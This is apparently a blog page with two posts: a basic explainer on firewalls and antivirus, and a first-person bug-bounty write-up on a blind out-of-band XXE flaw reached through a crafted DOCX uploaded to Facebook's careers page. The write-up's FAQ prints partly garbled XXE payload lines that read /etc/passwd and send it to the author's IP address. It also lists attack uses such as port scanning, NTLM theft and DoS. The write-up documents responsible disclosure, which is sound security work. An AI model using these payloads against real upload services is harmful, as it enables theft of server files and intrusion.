Using Firewall and Antivirus to Protect Against Hacking

December 7, 2020

Want to know how to use Firewall and Antivirus to protect against hacking? You have come to the right place!

Firewall and Antivirus. When it comes to cybersecurity products, we frequently hear about these two terms. If we don’t know what they are and how they work, we begin to merge them in our minds as similar software.

In reality, the two are very different from each other and serve entirely separates purposes. If you visit the official website of any antivirus company, you’ll see that under product features, both firewall and antivirus (sometimes coupled with antispyware or anti-ransomware) are mentioned separately.

That’s because they provide different kinds of security. So, now that we have established that the two are separate things, let’s talk about what they are and how they work.

Learn more about us or see our reviews.

What is a Firewall?

Let’s begin simply. A firewall is a sort of virtual wall that stops unwanted visitors. It’s a barrier that stands between your home network and other networks or the World Wide Web.

How it Works?

The firewall is responsible for monitoring the incoming and outgoing data or requests and blocking the ones that it finds suspicious and shouldn’t be communicated.

For instance, let’s say you installed an app that turned out to be corrupt. Now the app will most likely try and establish a connection with another source on the internet. But if you have a firewall installed, it will prevent the app from going ahead with this activity.

Similarly, if some rogue application on the internet tries to reach an app on your device – for instance, your webcam – the firewall will intervene to prevent that.

So, in essence, your firewall is like a guard at your door. Only this guard has the dual responsibility also to filter out the outbound traffic.

Firewall Protection

Types of Firewall

Firewalls work at different levels to provide specialized monitoring for varied purposes.

Packet Filtering – Packets are incoming and outgoing chunks of data that are monitored and analyzed against a set of predefined filters. If the filters clear these packets, they are let through. If they are found to be suspicious, they are blocked. The packet filtering firewall is also called Network Layer Firewall.

Firewall And Its Packet Filters

Proxy Server – At this level, the firewall provides security to a local network filtering out relevant traffic to and from the internet or another larger network. It’s also known as Application Layer Firewall.

Firewall Proxy Servers

Circuit-Level Gateway – This firewall is similar to the application level firewall, but it works at the session level and offers some added functionality. When the proxy server establishes a connection with the Web server for any webpage access, the server sends back a response. The circuit-gateway determines whether the requested session is legitimate or not and allows or blocks the access accordingly.

Firewall Circuit level Gateway

During this communication, the firewall also hides the proxy server’s IP address as it doesn’t let any internal user information through.

Firewall

What is an Antivirus?

As opposed to a firewall, antivirus software works at the system level protecting it from any malicious files or programs. Also referred to as antimalware, the antivirus is responsible for keeping your system secure from all kinds of malware attacks either by isolating or removing them.

How does an Antivirus Work?

The antivirus software scans all the files and apps on your system against its definitions of suspicious coding. If it detects anything that seems out of place or outright malicious, the antivirus instantly blocks its activity and then removes it from the system.

There are essentially three steps that an antivirus follows: Scan > Detect > Remove. Antivirus protection includes malware types, such as viruses, worms, Trojan horses, botnets, adware, ransomware, spyware, etc.

Antiviruses

Types of Detection

Typically, antivirus software use three different types of detection techniques.

Specific Detection – As the name suggests, this detection method looks for particular kinds of known malware types based on their defining characteristics.

Specific Detection By Antivirus

Generic Detection – This technique scans for malware types that are variants of known malware families or that share a common codebase.

Generic Detection by Antivirus

Heuristic Detection – This is the most advanced detection method that, instead of coding, looks for unusual or suspicious behaviors or file structures.

Modern antivirus software use all three techniques to secure your devices against known as well as emerging malware threats.

Heuristic Detection

Key Differentiators between a Firewall and Antivirus

So, let’s look at some chief differences between a firewall and an antivirus:

Implementation
Firewalls can be implemented in both software and hardware, whereas Antivirus only protects software.
Protection Capacity
Firewalls only guard against external attacks, whereas Antivirus provides security against both internal and external threats.
Security Mechanism
Firewalls can block external threats, but if a rogue element enters the system through another means (such as email links or removable media), the firewall cannot remove the malicious code. Antivirus, on the other hand, periodically scans the system and protects against malicious software on an on-going basis.
Probability of Security Breach
A firewall can be tricked by IP spoofing (modified source address) and Source Routing (specifying a route for packets). However, in the case of antivirus, once malware has been detected, it cannot carry out any counterattack.

So, which one do you need?

Since both software are entirely different and provide different kinds of protection, there’s no question of choosing one over the other. Most advanced cybersecurity products incorporate both software as they are crucial to security requirements.

In a nutshell…

If we employ the antivirus protection without the firewall, we open up our private network and the connected devices to a host of external attacks. At the system level, the antivirus will fight them off, but it will end up in increased use of resources.

That’s why whenever you choose a cybersecurity package (or buy separate security products), make sure it incorporates both firewall and antivirus software to provide a maximum level of protection from cyber threats.

How I Hacked Facebook With A Word Document

December 3, 2020

The Motivation:

In one day I decided to stop hunting Bugs in Facebook AndroidIOS and Windows phone apps and start hunting bugs in facebook.com website. I said to myself can i hack Facebook? or any of Facebook’s websites or servers? I said why not?!

Facebook Tough Security:

Facebook as you know is pretty secure because of many people already reported high severity security bugs since 2010 and they patched a dangerous XML External Entity (XXE) Processing Vulnerability affecting OpenID in late 2013.

They said that all of their servers are patched according to this post by their security team: https://www.facebook.com/BugBounty/posts/778897822124446

The Challenge:

I thought it is a DEAD end and I won’t find any XXE vulnerabilities after Facebook patched their servers with Takedown tool they developed but I challenged myself to find XXE in Facebook and after some time digging and hunting, I found this URL: https://www.facebook.com/careers/

The Hack:

I tried to upload my CV and it was accepted and uploaded successfully BUT I can only upload PDF and DOCX files but I already know that .docx files are zipped xml files developed by Microsoft according to wikipedia: http://en.wikipedia.org/wiki/Office_Open_XML

I simply opened MS word 2010 then typed some random text and saved it on my desktop as: CV.docx after that i successfully uploaded it to Facebook and Nothing fancy happened as you expected but I must find a vulnerability today or i will lose my challenge 

Injecting XML Payload inside CV.docx to read /etc/passwd:

I quickly opened CV.docx with 7zip program on windows 7 and extracted all the contents of CV.docx file then I found some xml files after that  I decided to open this file: [Content_Types].xml and insert this innocent xml code:

 The Evil Twin:

I already have another file ext.dtd waiting in mohaab007 directory and here is the content of ext.dtd:

The Setup:

Now I have a forged CV.docx file and it is ready to Rock after that i opened port 80 in my home router and started python simple http server:

mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80

Password:

Serving HTTP on 0.0.0.0 port 80 …

python-http-server.jpg

The Shock:

I inserted my External IP address and all I want to see is a response in python http server saying that something is trying to connect to me. Now every thing is good and then i uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened.

I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minuteor so chatting and browsing but now it is time to stop python http server and close Facebook and everything .

I was going to close my terminal window and I was shocked to see that something connected to my python http server:

The Impact:

I said WOOOOOOT  I forced a server belongs to Facebook to connect to my Python HTTP server using a sneaky way and now I can DO:

1- DoS on the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con

2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker)

3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)

4- DoS on other systems (if parsing system is allowed to establishTCP connections to other systems)

5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)

6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.

7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper.

The Rejection: 

I tried to read system files but the application doesn’t have privileges to read files or it might be a protection in place or or or … BUT I am 100% sure it is Blind XXE Out Of Band (OOB) plus it was a time-consuming process because I need to upload and wait the result after 15 minutes or more.

I didn’t waste too much time and reported it to Facebook Security team and They rejected my bug report and said:

facebook-reply-xxe-1.jpg

I sent a reply and they said:

Now I am LOST and said to myself HAHAHA it was a good time but it is over and it is not a Vulnerability after all but I got two connections from Facebook’s server plus CV.docx file is corrupted and can’t be opened with MS Office.

The Hope and The Promise:

After exchanging emails with Facebook security team, i got this reply:

BAAAAAAAAAAAAAM

Now it is time to take a rest and wait them to fix it…..

NOTE:

Now it is fixed and Facebook rewarded me with a nice bounty after that I found similar vulnerabilities in other websites using the same method.

The funny thing is Facebook said that they patched all of their servers by adding this line: libxml_disable_entity_loader(true) however I forced Facebook server to parse my external entities to do things I wanted and you can watch a video below showing you how I did it.

POC Video ( Facebook Blind XXE OOB):http://web.archive.org/web/20160315025854if_/http://www.youtube.com/embed/G17cdBicmJg?wmode=opaque&enablejsapi=1

References:

http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf (Must Read)

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf

http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf

The Unexpected Reward:

I am Listed in Facebook White hats (2014):

https://www.facebook.com/whitehat/thanks/

The Bottom Line: Facebook was suffering from an unexpected and sneaky XXE vulnerability but they fixed it and rewarded me for helping them.

Compare the risks:

Here is a comparison between Old XXE (OpenID) and My XXE (DOCX):

Facebook’s Official Reply:

facebook XXE reply.jpg

FAQ:

1.How did you put the extracted Docx data back into a docx?

I Opened CV.docx using 7zip windows app and insert XML code code then closed 7zip app and saved changes.

2.  What do you mean you put the ext.dtd into your directory?

The Purpose of a DTD (Document Type Definition) like (ext.dtd) is to define the legal building blocks of an XML document. Using External DTD file to exfiltrate data from other entities like SYSTEM entities is a trick from Alexey Osipov and Timur Yunusov.

3- In this part “http://197.37.102.90/FACEBOOK-HACKED?%25file;’>” would I replace that IP with my own?

Yes.

4- Do you think this would work on other job type websites where you can submit a resume or just specifically Facebook?

Yes, I tried it on other websites like coinbase.com and it worked and i was able to read system files.

5- In the part where it says: “I inserted my external IP address and all i want to see is a response in python http server saying that something is trying to connect to me” where did you insert the IP?

I inserted my IP in ext.dtd file:

<!ENTITY % all

“x25; send SYSTEM ‘http://197.37.102.90/FACEBOOK-HACKED?%25file;’>”

>

%all;

and in XXE Payload:

DOCTYPE root [

<!ENTITY % file SYSTEM “file:///etc/passwd”>

dtd SYSTEM “http://197.37.102.90/ext.dtd”>

%dtd;

%send;

]]>

6- What exactly did all that code you input do, specifically?

I highly recommend you to read this post:

http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html